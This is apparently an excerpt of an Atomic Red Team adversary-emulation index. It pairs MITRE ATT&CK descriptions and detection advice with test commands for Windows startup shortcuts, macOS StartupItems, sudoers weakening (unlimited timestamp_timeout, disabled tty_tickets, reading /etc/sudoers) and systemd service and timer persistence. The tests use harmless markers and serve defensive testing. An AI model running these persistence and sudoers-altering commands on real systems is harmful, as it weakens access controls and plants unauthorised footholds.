+ + Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic) + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1547.009 + atomic_tests: + - name: Shortcut Modification + auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce + description: | + This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; + gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. + Upon execution, calc.exe will be launched. + supported_platforms: + - windows + input_arguments: + shortcut_file_path: + description: shortcut modified and execute + type: path + default: "%temp%\\T1547.009_modified_shortcut.url" + executor: + command: | + echo [InternetShortcut] > #{shortcut_file_path} + echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} + #{shortcut_file_path} + cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 + +' + name: command_prompt + - name: Create shortcut to cmd in startup folders + auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 + description: | + LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" + to view the new shortcut. 
+ supported_platforms: + - windows + executor: + command: | + $Shell = New-Object -ComObject ("WScript.Shell") + $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") + $ShortCut.TargetPath="cmd.exe" + $ShortCut.WorkingDirectory = "C:\Windows\System32"; + $ShortCut.WindowStyle = 1; + $ShortCut.Description = "T1547.009."; + $ShortCut.Save() + + $Shell = New-Object -ComObject ("WScript.Shell") + $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") + $ShortCut.TargetPath="cmd.exe" + $ShortCut.WorkingDirectory = "C:\Windows\System32"; + $ShortCut.WindowStyle = 1; + $ShortCut.Description = "T1547.009."; + $ShortCut.Save() + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore + Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true + T1037.005: + technique: + id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f + description: "Adversaries may use startup items automatically executed at boot + initialization to establish persistence. Startup items execute during the + final phase of the boot process and contain shell scripts or other executable + files along with configuration information used by the system to determine + the execution order for all startup items. (Citation: Startup Items)\n\nThis + is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), + and thus the appropriate folder, /Library/StartupItems isn’t + guaranteed to exist on the system by default, but does appear to exist by + default on macOS Sierra. A startup item is a directory whose executable and + configuration property list (plist), StartupParameters.plist, + reside in the top-level directory. 
\n\nAn adversary can create the appropriate + folders/files in the StartupItems directory to register their own persistence + mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since + StartupItems run during the bootup phase of macOS, they will run as the elevated + root user." + name: Startup Items + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.005 + url: https://attack.mitre.org/techniques/T1037/005 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html + description: Apple. (2016, September 13). Startup Items. Retrieved July 11, + 2017. + source_name: Startup Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:47:39.124Z' + created: '2020-01-15T18:00:33.603Z' + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. + + Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. 
+ x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1037.005 + atomic_tests: + - name: Add file to Local Library StartupItems + auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 + description: | + Modify or create an file in /Library/StartupItems + + [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) + supported_platforms: + - macos + executor: + command: 'sudo touch /Library/StartupItems/EvilStartup.plist + +' + cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist + +' + name: sh + elevation_required: true + T1548.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1548.003 + url: https://attack.mitre.org/techniques/T1548/003 + - url: https://www.sudo.ws/ + description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018. + source_name: sudo man page 2018 + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. + source_name: OSX.Dok Malware + - url: https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does + description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually + Does. Retrieved March 19, 2018. + source_name: cybereason osx proton + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Sudo and Sudo Caching + description: |- + Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. 
+ + Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). + + The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though. + + Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. 
For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. + + In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. + id: attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-27T01:03:26.306Z' + created: '2020-01-30T14:34:44.992Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - root + x_mitre_permissions_required: + - User + x_mitre_detection: On Linux, auditd can alert every time a user's actual ID + and effective ID are different (this is what happens when you sudo). This + technique is abusing normal functionality in macOS and Linux systems, but + sudo has the ability to log all input and output based on the LOG_INPUT + and LOG_OUTPUT directives in the /etc/sudoers file. + x_mitre_data_sources: + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + x_mitre_platforms: + - Linux + - macOS + identifier: T1548.003 + atomic_tests: + - name: Sudo usage + auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e + description: 'Common Sudo enumeration methods. 
+ +' + supported_platforms: + - macos + - linux + executor: + name: sh + elevation_required: true + command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" + - name: Unlimited sudo cache timeout + auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc + description: 'Sets sudo caching timestamp_timeout to a value for unlimited. + This is dangerous to modify without using ''visudo'', do not do this on a + production system. + +' + supported_platforms: + - macos + - linux + executor: + name: sh + elevation_required: true + command: | + sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers + sudo visudo -c -f /etc/sudoers + - name: Disable tty_tickets for sudo caching + auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 + description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous + to modify without using ''visudo'', do not do this on a production system. + +' + supported_platforms: + - macos + - linux + executor: + name: sh + elevation_required: true + command: |- + sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" + sudo visudo -c -f /etc/sudoers + T1543.002: + technique: + id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b + description: "Adversaries may create or modify systemd services to repeatedly + execute malicious payloads as part of persistence. 
The systemd service manager + is commonly used for managing background daemon processes (also known as services) + and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: + Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization + (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, + CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit + and Upstart while remaining backwards compatible with the aforementioned init + systems.\n\nSystemd utilizes configuration files known as service units to + control how services boot and under what conditions. By default, these unit + files are stored in the /etc/systemd/system and /usr/lib/systemd/system + directories and have the file extension .service. Each service + unit file may contain numerous directives that can execute system commands:\n\n* + ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands + when a services is started manually by 'systemctl' or on system start if the + service is set to automatically start. \n* ExecReload directive covers when + a service restarts. 
\n* ExecStop and ExecStopPost directives cover when a + service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd + functionality to establish persistent access to victim systems by creating + and/or modifying service unit files that cause systemd to execute malicious + commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries + typically require root privileges to create/modify service unit files in the + /etc/systemd/system and /usr/lib/systemd/system + directories, low privilege users can create/modify service unit files in directories + such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: + Rapid7 Service Persistence 22JUNE2016)" + name: Systemd Service + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1543.002 + url: https://attack.mitre.org/techniques/T1543/002 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - source_name: Freedesktop.org Linux systemd 29SEP2018 + url: https://www.freedesktop.org/wiki/Software/systemd/ + description: Freedesktop.org. (2018, September 29). systemd System and Service + Manager. Retrieved April 23, 2019. + - source_name: Anomali Rocke March 2019 + url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang + description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With + a New Malware Family Written in Golang. Retrieved April 24, 2019. 
+ - source_name: Rapid7 Service Persistence 22JUNE2016 + url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence + description: Rapid7. (2016, June 22). Service Persistence. Retrieved April + 23, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.701Z' + created: '2020-01-17T16:15:19.870Z' + x_mitre_platforms: + - Linux + x_mitre_detection: |- + Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution. 
+ x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_contributors: + - Tony Lambert, Red Canary + identifier: T1543.002 + atomic_tests: + - name: Create Systemd Service + auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + description: 'This test creates a Systemd service unit file and enables it as + a service. + +' + supported_platforms: + - linux + input_arguments: + systemd_service_path: + description: Path to systemd service unit file + type: Path + default: "/etc/systemd/system" + systemd_service_file: + description: File name of systemd service unit file + type: String + default: art-systemd-service.service + execstoppost_action: + description: ExecStopPost action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstoppost-marker" + execreload_action: + description: ExecReload action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execreload-marker" + execstart_action: + description: ExecStart action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstart-marker" + execstop_action: + description: ExecStop action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstop-marker" + execstartpre_action: + description: ExecStartPre action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstartpre-marker" + execstartpost_action: + description: ExecStartPost action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstartpost-marker" + executor: + command: | + echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} + echo "Description=Atomic Red Team Systemd Service" >> 
#{systemd_service_path}/#{systemd_service_file} + echo "" >> #{systemd_service_path}/#{systemd_service_file} + echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} + echo "Type=simple" + echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "" >> #{systemd_service_path}/#{systemd_service_file} + echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} + echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} + systemctl daemon-reload + systemctl enable #{systemd_service_file} + systemctl start #{systemd_service_file} + cleanup_command: | + systemctl stop #{systemd_service_file} + systemctl disable #{systemd_service_file} + rm -rf #{systemd_service_path}/#{systemd_service_file} + systemctl daemon-reload + name: bash + T1053.006: + technique: + id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 + description: |- + Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) + + Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. 
.service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. + + An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. + name: Systemd Timers + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1053.006 + url: https://attack.mitre.org/techniques/T1053/006 + - source_name: archlinux Systemd Timers Aug 2020 + url: https://wiki.archlinux.org/index.php/Systemd/Timers + description: archlinux. (2020, August 11). systemd/Timers. Retrieved October + 12, 2020. + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux + AUR Package Repository. Retrieved April 23, 2019. + url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ + source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 + - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public + Arch package compromise. 
Retrieved April 23, 2019. + url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a + source_name: gist Arch package compromise 10JUL2018 + - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved + April 23, 2019. + url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html + source_name: acroread package compromised Arch Linux Mail 8JUL2018 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-14T15:20:00.754Z' + created: '2020-10-12T17:50:31.584Z' + x_mitre_platforms: + - Linux + x_mitre_contributors: + - SarathKumar Rajendran, Trimble Inc + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: |- + Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. 
+ + Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1053.006 + atomic_tests: + - name: Create Systemd Service and Timer + auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b + description: "This test creates Systemd service and timer then starts and enables + the Systemd timer \n" + supported_platforms: + - linux + input_arguments: + path_to_systemd_service: + description: Path to systemd service unit file + type: Path + default: "/etc/systemd/system/art-timer.service" + path_to_systemd_timer: + description: Path to service timer file + type: Path + default: "/etc/systemd/system/art-timer.timer" + systemd_service_name: + description: Name of systemd service + type: String + default: art-timer.service + systemd_timer_name: + description: Name of systemd service timer + type: String + default: art-timer.timer + executor: + command: | + echo "[Unit]" > #{path_to_systemd_service} + echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} + echo "[Service]" >> #{path_to_systemd_service} + echo "Type=simple" >> #{path_to_systemd_service} + echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} + echo "[Install]" >> #{path_to_systemd_service} + echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} + echo "[Unit]" > #{path_to_systemd_timer} + echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} + echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} + echo "[Timer]" >> #{path_to_systemd_timer} + echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} + echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} + echo "[Install]" >> #{path_to_systemd_timer} + echo "WantedBy=timers.target" >> 
#{path_to_systemd_timer} + systemctl start #{systemd_timer_name} + systemctl enable #{systemd_timer_name} + systemctl daemon-reload + cleanup_command: | + systemctl stop #{systemd_timer_name} + systemctl disable #{systemd_timer_name} + rm #{path_to_systemd_service} + rm #{path_to_systemd_timer} + systemctl daemon-reload + name: bash + T1055.003: + technique: + created: '2020-01-14T01:28:32.166Z' + modified: '2020-11-10T18:29:30.941Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 + description: "Adversaries may inject malicious code into hijacked processes + in order to evade process-based defenses as well as possibly elevate privileges. + Thread Execution Hijacking is a method of executing arbitrary code in the + address space of a separate live process. \n\nThread Execution Hijacking is + commonly performed by suspending an existing process then unmapping/hollowing + its memory, which can then be replaced with malicious code or the path to + a DLL. A handle to an existing victim process is first created with native + Windows API calls such as OpenThread. At this point the process + can be suspended then written to, realigned to the injected code, and resumed + via SuspendThread , VirtualAllocEx, WriteProcessMemory, + SetThreadContext, then ResumeThread respectively.(Citation: + Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) + but targets an existing process rather than creating a process in a suspended + state. \n\nRunning code in the context of another process may allow access + to the process's memory, system/network resources, and possibly elevated privileges. 
+ Execution via Thread Execution Hijacking may also evade detection from security + products since the execution is masked under a legitimate process. " + name: Thread Execution Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.003 + url: https://attack.mitre.org/techniques/T1055/003 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, + and those that can be used to modify memory within another process, such as + VirtualAllocEx/WriteProcessMemory, may be used for + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. 
" + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + atomic_tests: [] + T1055.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.005 + url: https://attack.mitre.org/techniques/T1055/005 + - url: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html + description: Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif + Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. + Retrieved December 18, 2017. + source_name: FireEye TLS Nov 2017 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Thread Local Storage + description: "Adversaries may inject malicious code into processes via thread + local storage (TLS) callbacks in order to evade process-based defenses as + well as possibly elevate privileges. TLS callback injection is a method of + executing arbitrary code in the address space of a separate live process. + \n\nTLS callback injection involves manipulating pointers inside a portable + executable (PE) to redirect a process to malicious code before reaching the + code's legitimate entry point. TLS callbacks are normally used by the OS to + setup and/or cleanup data used by threads. 
Manipulating TLS callbacks may + be performed by allocating and writing to specific offsets within a process’ + memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) + techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: + FireEye TLS Nov 2017)\n\nRunning code in the context of another process may + allow access to the process's memory, system/network resources, and possibly + elevated privileges. Execution via TLS callback injection may also evade detection + from security products since the execution is masked under a legitimate process. " + id: attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:30.984Z' + created: '2020-01-14T01:30:41.092Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, + and those that can be used to modify memory within another process, such as + VirtualAllocEx/WriteProcessMemory, may be used for + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. 
" + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1547.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.003 + url: https://attack.mitre.org/techniques/T1547/003 + - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top + description: Microsoft. (2018, February 1). Windows Time Service (W32Time). + Retrieved March 26, 2018. + source_name: Microsoft W32Time Feb 2018 + - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx + description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. + source_name: Microsoft TimeProvider + - url: https://github.com/scottlundgren/w32time + description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26, + 2018. + source_name: Github W32Time Oct 2017 + - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings + description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. + Retrieved March 26, 2018. + source_name: Microsoft W32Time May 2017 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Time Providers + description: |- + Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. 
(Citation: Microsoft TimeProvider) + + Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) + + Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) + id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:24:26.476Z' + created: '2020-01-24T15:51:52.317Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_detection: |- + Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) + + The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. 
